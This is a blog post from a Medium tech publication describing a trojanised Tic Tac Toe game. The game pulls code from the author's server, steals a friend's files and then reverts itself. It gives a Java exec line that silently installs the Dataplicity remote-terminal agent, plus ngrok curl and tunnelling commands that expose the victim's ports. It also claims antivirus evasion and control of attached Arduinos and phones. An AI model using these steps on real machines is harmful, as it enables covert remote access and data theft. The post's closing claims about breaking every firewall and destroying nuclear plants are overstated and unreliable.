Self-Mutating Program and its effects

Aditya Mitra
May 13 · 6 min read

Let me start with what is a program. Come on, everyone knows it: A set of instructions that a computer executes to do a specific task — it takes in some data as input and produces some output. Is there anything more to a program? No. I don’t think so. Yeah, some of you might say that some programs like AIs can also mimic human intelligence to not process the data in a fixed procedure. Yeah, I agree. But even they follow a fixed instruction set even if the instructions are very complex.

Now, by the name, I do hope it is clear what a ‘Self-Mutating Program’ is. It is a program that can change the instruction set on its own. So, what can be its affects? Essentially, now there are 3 options:
1. The program generates its own modified source code based on certain conditions or an AI.
2. Someone suggests the changes to the program and the program modifies itself accordingly.
3. What the new code will be is already specified in the original code.

Now let’s discuss it case by case. Looking at Case 1: The program generates its own modified source code. Yes, this is indeed possible. The ‘Certain conditions’ that I said might be things like the User Machine architecture, or certain hardware configuration, or existence or absence of certain files or anything. The program can generate its own new source code based on the conditions. I am not going into the ‘AI’ part because I myself don’t understand it well. It would not be correct of me to comment on it.

Case 2: Someone suggests the edit. Yes, this is the one I personally like the most. Imagine, you downloading a simple game like a Tic Tac Toe but the game automatically changes itself into a virus, capable of harming your system in whatever way it wants. It may sound hypothetical but I have myself written the same code and it has worked perfectly. (The code has not been made available publicly understanding the security issues. So don’t expect a GitHub repo. :-P ). I have myself been able to send my friend a simple Tic Tac Toe game. As he was playing it, I hosted the modified code in a personal server and the game automatically downloaded the code, modified itself according to it, sent me the personal files from his machine and again mutate itself back into the original harmless game, waiting for further instructions that I might send. Looks like a plot out of a Hollywood movie, right? No. It isn’t. Me and a friend tested it and it is perfect.

Adding more twists to it. Now, tell me how I hosted the code? A simple text file maybe? Yes. I did that. A simple text file containing the malicious code. Now, from where was my code downloaded? My friend’s machine but my friend won’t be able to know that anyhow (unless he checks the packets transferred over internet.) Now where was the program mutated? My friend’s computer. So, when you would check for the name of the author, or of the originating machine, it would show my friend’s name. So, there is not a single trace of me, the original developer of the malicious code. So, no one knows who is the author of the malicious code.

Before going further, I would like to say a bit about my skills. I am a College Fresher as of now but I am skilled well in Java (an Oracle Certified Associate, Java SE 8 Programmer to be precise). I am also somewhat skilled in Linux and Windows Command Line operations.

Okay, now let’s go on. One more twist. Hope you guys know about Dataplicity. According to the official website, “Dataplicity lets you control, manage and repair your devices even as they roam between cellular, satellite and fixed networks beyond your control.” Well now, let’s still assume I am the attacker while my friend is the victim.

Let’s say I just mutated the original Tic-Tac-Toe game to add only 3 lines (I am talking in Java):

try {
Runtime.getRuntime().exec(“<Dataplicity installer code>”);
} catch(Exception excep){}

I have already created an account in Dataplicity, got my own token containing the installer code. I just added that into the malicious Tic-Tac-Toe. And boom! I have full Terminal access of my friend’s computer and he has literally zero idea. And after the Dataplicity installation is done, I revert the code back to the original code remotely. Now I have permanent terminal access of his computer until I manually delete the access to his machine from my system. He doesn’t even have the option to remove the Dataplicity client. There are more services similar to Dataplicity but I prefer Dataplicity itself.

Ready for a few more twists? Now suppose you have successfully managed to install Dataplicity into the victim’s device using a self-mutating code. Now you can download ‘ngrok’ into his machine, use your own auth token and forward his ports. Now what is ‘ngrok’? According to the official website, ‘Ngrok exposes local servers behind NATs and firewalls to the public internet over secure tunnels.’ There are services similar to ngrok, like Localtunnel. Ngrok doesn’t provide a fixed URL (in its free tier) but localtunnel does. On the other hand, setting up localtunnel requires you to have root or sudo access to the victim’s machine while for installing ngrok doesn’t. Hence ngrok is the best bet here. Simple, curl the ngrok client, and add authtoken.

$ curl <URL to ngrok agent zip> -o ngrok.zip
$ unzip ngrok.zip
$ ./ngrok authtoken <AUTHTOKEN>
$ ./ngrok http <port>
OR
$ ./ngrok tcp <port>
OR
$ ./ngrok tls <port>

Now use ngrok from dataplicity to expose the ports of the victim’s computer. Boom! You have also broken the firewalls.

Thrilling, isn’t it? Hell yeah. And the original game won’t even be flagged by usual antiviruses because it is seemingly harmless. And when it mutates itself, the antivirus might flag it but it will be too late. The program would already have started executing and maybe would have finished the malicious task. Antiviruses might even not be able to flag it.

Case 3: The original program already specifies what the mutated code will be. Well, this is not so thrilling. This is because in this way, it would mutate only a fixed and small number of times. However, it could still be used in some cases.

As a conclusion, I would like to say that self-mutating codes can provide a huge window to hackers and cyber criminals. Self-mutating codes can also be used to tap into connected hardware. In industry, imagine a machine getting affected by it and in turn, it affects all the PLCs (Programmable Logic Controller) in the industry. None of the physical machines are working properly now. PLCs are used everywhere, starting from factories to hospitals, everywhere. Even nuclear plants. Imagine a small piece of seemingly harmless code, breaks every firewall, gives terminal access to the attacker and uploads code to the connected hardware and PLCs, sends private files to the attacker, and many more. The possibilities just lie on the hands of the attacker. A harmless piece of code can blow up a nuclear power plant, killing a lot of people. It may seem just a plot out of a Hollywood movie, but it is not. I have uploaded a malicious code into a connected Arduino on the victim’s pc by getting Dataplicity Terminal access to the victim’s machine and using the arduino-cli. This shows, it is indeed possible to override PLCs and affect industrial machines. What more? I have also run commands on a connected android phone with ADB. Everything is possible. You can also have access to the private WiFi network or Bluetooth PAN (Personal Area Network) of the victim’s machine. Seriously everything is possible. And I did not write a single line without testing it myself.

Beware, stay safe. The methods of the attackers are increasing. You should be able to protect yourself. Unfortunately, I cannot suggest any method of protection against this attack. This can literally become a Zero Day Attack.

P.S. This article is only for educational purposes. This is not a hacking tutorial.

Video Demo:

https://youtu.be/DBKMRpPZdO8

Nerd For Tech

From Confusion to Clarification

Nerd For Tech

NFT is an Educational Media House. Our mission is to bring the invaluable knowledge and experiences of experts from all over the world to the novice. To know more about us, visit https://www.nerdfortech.org/. Don’t forget to check out Ask-NFT, a mentorship ecosystem we’ve started

Aditya Mitra

Written by

Computer Science Enthusiast. A fan of retro computing. Meet me at adityamitra5102.github.io

Nerd For Tech

NFT is an Educational Media House. Our mission is to bring the invaluable knowledge and experiences of experts from all over the world to the novice. To know more about us, visit https://www.nerdfortech.org/. Don’t forget to check out Ask-NFT, a mentorship ecosystem we’ve started

Medium is an open platform where 170 million readers come to find insightful and dynamic thinking. Here, expert and undiscovered voices alike dive into the heart of any topic and bring new ideas to the surface. Learn more

Follow the writers, publications, and topics that matter to you, and you’ll see them on your homepage and in your inbox. Explore

If you have a story to tell, knowledge to share, or a perspective to offer — welcome home. It’s easy and free to post your thinking on any topic. Write on Medium

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store